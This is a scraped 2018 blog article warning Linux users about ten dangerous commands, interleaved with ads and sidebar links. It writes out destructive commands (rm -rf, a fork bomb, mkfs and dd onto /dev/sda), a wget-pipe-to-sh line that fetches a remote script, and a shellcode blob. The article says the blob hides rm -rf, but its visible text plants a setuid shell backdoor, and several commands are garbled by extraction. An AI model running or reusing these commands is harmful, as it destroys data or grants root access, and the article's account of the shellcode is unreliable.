You are on page 1of 3

10/4/2018 10 Most Dangerous Linux Commands You Should Never Execute

What are you looking for? 


16
Shares

16

Get a Custom Email for Your Domain with G Suite

Ad The most secure work email comes with a custom domain. Start a 14-day fre

G Suite by Google Cloud

Sign Up

10 Most Dangerous Linux Commands


STAY CONNECTED
You Should Never Execute
 Tushar Subhra Dutta  2 Years Ago     

10 Most Dangerous Linux Commands You Should Never Execute 

10 Most Dangerous Linux Commands You Should Never Execute


Tech Viral
1,386,483 likes

Bash Script Remove Malware


Like Page Use
Linux System Android APK Downloads
Be the first of your friends to like this

Linux command line is very productive, useful and interesting, but


sometimes it can be very dangerous, especially when you are not sure of
what you are doing. This article does not intend to make it angry Linux TRENDING
command line. This article is created to alert Linux users to some of the
commands that you should think twice before executing them.

Ad closed by
Stop seeing this ad Why this ad?

10 Most Dangerous Linux Commands You Should


Never Execute
The command line in Linux is very productive, useful and interesting, however, it can
sometimes be very dangerous, especially when dealing user root or user that can take
most of their privileges, sudo. You must know exactly what you’re doing. This article
was created to simply alert Linux users to some of the terminal commands, that every
Linux user should think twice before executing them.

1. rm -rf

https://techviral.net/dangerous-linux-commands/ 1/4
10/4/2018 10 Most Dangerous Linux Commands You Should Never Execute

The rm -rf command is one of the fastest ways to delete a folder and its contents. But a
LATEST
little typing error or ignorance can result in unrecoverable damage to the system. Some
of the options used with the rm command are like Rm -r command deletes the folder Thunder VPN Pro
16
Shares recursively, even the empty folder. rm -f Command removes “only read the file ‘without Thunder APK v2.4.11 Latest
asking. It also has the power to eliminate all files present in the root directory. VPN Version …
Pro  October 4, 2018 
16 APK 0
v2.4.11
3 Phase Latest
Version
2 in 1 Free
Download
2.: () {: |: &} ;: 2018

The above command is the fork bomb. It operates by defining a function called ”, which New iPhones Gets
is called twice, once in the foreground and once in the background. It keeps running Weak Response!
40-45% Stock …
again and again until the system freezes.
 October 3, 2018  1

3. command> / dev / sda Microsoft Just


Launched An
The above command writes the output of ‘command on the block / dev / sda . The Interesting App
For …
above command writes raw data and all files on the block will be replaced with raw
 October 3, 2018  0
data, resulting in total loss of data in the block.
Google To Launch
4. mv directory / dev / null Its Pixel Slate
With …
This command basically moves all the files to / dev / null, yes, it means that it simply  October 3, 2018 

disappear all the files from the system. 0

FBI Forces Suspect


5. wget http: // malicious_source -O | sh
To Unlock iPhone
X…
The above command will download a script from a malicious source and then run it on  October 2, 2018 
your system. The Wget command will download the script and sh command will run the 0

downloaded script on your system.


Microsoft Just
Released Office
6. Mkfs.ext3 / dev / sda 2019 For
Windows …
The above command will simply format the block ‘sda’ and you will definitely know that  October 2, 2018  0
after running the above command your Block (Hard Disk Drive) will be reset to NEW!
Without the data, leaving the system in unrecoverable phase.

7. > File

The above command is used to release the file content. If the above command is
executed with a typing error or ignorance as “> xt.conf” will write the configuration file or
any other system or configuration file.

8. ^ foo ^ bar

This command is used to edit the previous command without the need to retype the
entire command again. But it can be really problematic if you do not take the risk to
carefully check the change in the original command using ^ ^ foo bar command.

9. dd if = / dev / random of = / dev / sda

The above command will end as / dev / sda and write random data for the block. Of
course! Your system would be left in inconsistent and unrecoverable phase.

10. invisible Command

The following command is nothing more than the first command of this article ( rm-rf ).
Here the codes are hidden in hex to an ignorant user can be fooled. Running the code
below into your terminal and clear your root partition.

https://techviral.net/dangerous-linux-commands/ 2/4
10/4/2018 10 Most Dangerous Linux Commands You Should Never Execute

This command here shows that the threat can be hidden and usually undetectable
sometimes. You should be aware of what you are doing and what would be the result.
Not compile / run code from an unknown source.
16
Shares

Download PDF (Free)


16
Ad To View PDF, Download Here

ProPDFConverter.com

Learn more

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ =


“\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond;
chmod 4755 /tmp/.beyond;”;

2 in 1 Where Can I Go to Get a Background

Replacing Window 10 Windows

 FACEBOOK      

RELATED POSTS

Best Graphic Design Best Identity Theft Best Hacking Tools For
Tools for Non-Designers Protection Services of Linux
2018 2018
Top 15 Best
5 of the Best Best Identity Theft Hacking Tools For
Graphic Design Protection Services Linux
Tools for Non- of 2018  Manpreet Singh 
Designers
 Karanpreet Singh  September 26, 2016
 Karanpreet Singh  March 31, 2018
July 14, 2018

10 Must-Have Android 10 Things To Remember Best iPhone Apps For


Apps less than $1 2018 Before Buying A Used Developers or
Smartphone Programmers
10 Must-Have
Android Apps less 13 Things To Top 10 Best iPhone
than $1 Remember Before Apps For
 Karanpreet Singh 
Buying A Used Developers or
Smartphone Programmers
March 12, 2018
 Karanpreet Singh   Karanpreet Singh 

August 3, 2018 June 21, 2016

TECH VIRAL APP DMCA PROTECTION

https://techviral.net/dangerous-linux-commands/ 3/4

You might also like